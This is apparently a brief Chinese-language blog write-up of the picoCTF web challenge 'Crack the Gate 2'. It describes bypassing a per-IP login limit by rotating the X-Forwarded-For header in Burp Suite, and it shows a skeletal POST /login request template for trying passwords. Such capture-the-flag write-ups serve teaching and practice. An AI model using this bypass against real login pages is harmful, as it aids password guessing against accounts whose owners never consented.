WriteUp picoCTFWeb Crack the Gate 2 Copy as Markdown 2 個月前 0 分鐘 約 70 字 分類:Web 難度:Medium 工具H3 Burp Suite 過程H3 該題限制了 IP 請求,但是可以使用封包的 X-Forwarded-For 標頭來繞過 所以就拿 Burp Suite 手動嘗試也可以,因為密碼嘗試還蠻少的 POST /login HTTP/1.1 Host: amiable-citadel.picoctf.net:49785 ... X-Forwarded-For: 1.1.1.X {"email":"ctf-player@picoctf.org","password":"..."} 資源H3 X-Forwarded-For tantuyu. :)tantuyu. :) 上一篇 Secret Box 下一篇 SSTI2